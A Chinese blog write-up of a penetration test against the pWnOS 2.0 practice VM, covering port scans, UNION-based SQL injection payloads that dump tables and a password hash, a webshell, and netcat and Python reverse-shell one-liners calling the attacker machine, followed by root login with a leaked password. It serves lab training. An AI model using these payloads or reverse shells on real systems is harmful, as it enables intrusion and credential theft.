【学渗透靶机 ——pWnOS: 2.0】

本文描述了一次针对pWnOS2.0靶机的渗透测试过程,包括使用NMAP扫描开放端口,发现80端口的Web服务和SQL注入漏洞。通过SQL注入获取数据库信息,尝试SSH登录。然后,利用Apache的web目录上传并执行webshell,尝试反弹shell,最终通过Python成功获取了系统的更高权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境

攻击机:kali
靶机:pWnOS: 2.0
此靶机比较特殊,vmware靶机。靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,
在这里插入图片描述
攻击机KALI IP为10.10.10.128
在这里插入图片描述

信息收集

主机信息收集:

已知靶机IP为10.10.10.100,所以我们直接扫描靶机开放端口 ,扫描结果如下图:

 nmap --min-rate 10000 -p- 10.10.10.100

在这里插入图片描述
主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图

sudo nmap -sT -sV -O -p22,80 10.10.10.100

在这里插入图片描述

web信息收集

访问80

在这里插入图片描述

发现有登录和注册界面跳转,尝试访问看看
登录:
在这里插入图片描述
测试是否有sql 注入
使用burp 抓包测试:存在报错注入 ,如下图
在这里插入图片描述
通过尝试发现报错注入点在数字4 的位置
在这里插入图片描述
收集数据库相关信息:
利用数据库字段获取数据库的库、表、字段信息
查询当前数据库中有哪些表

' union select 1,2,3,group_concat(table_name,''),5,6,7,8  from  information_schema.tables where table_schema=database() -- -

在这里插入图片描述
查询users表中有哪些字段

' union select 1,2,3,COLUMN_NAME,5,6,7,8 from  information_schema.columns where TABLE_NAME="user" -- -

在这里插入图片描述
查询uses 中的账号密码:
在这里插入图片描述
密码为:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
通过工具对字符串进行判断:
在这里插入图片描述
破解出密码如下:
在这里插入图片描述

使用这个密码尝试ssh 登录 失败

收集数据库信息获取到当前用户为root ,权限比较高,
在这里插入图片描述

可以尝试上传web shell ,上传web必须知道路径,通过端口信息收集到的80 端口是apache 的web 服务,默认情况的web 目录为/var/www 我们可以尝试先判断:
在这里插入图片描述
靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,在这里插入图片描述
发现数据库配置文件:读取该文件信息
在这里插入图片描述
发现又有个账号root \goodday 尝试ssh 登录 失败,
既然能够读取文件、那我们尝试写文件
在这里插入图片描述
出现报错信息,不用管,我们尝试访问这个webshell,访问成功如下图:
在这里插入图片描述

使用命令查看是否安装nc 或者python,发现nc、和python 环境都有
在这里插入图片描述
在这里插入图片描述

使用nc 反弹shell ,失败

nc -nv 10.10.10.128 443 -e /'bin/bash'

使用python 反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
成功拿到webshell

权限提升

浏览文件发现一个数据库配置文件,读取文件有root 和密码,如下图:
在这里插入图片描述
使用该账号密码登录成功
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值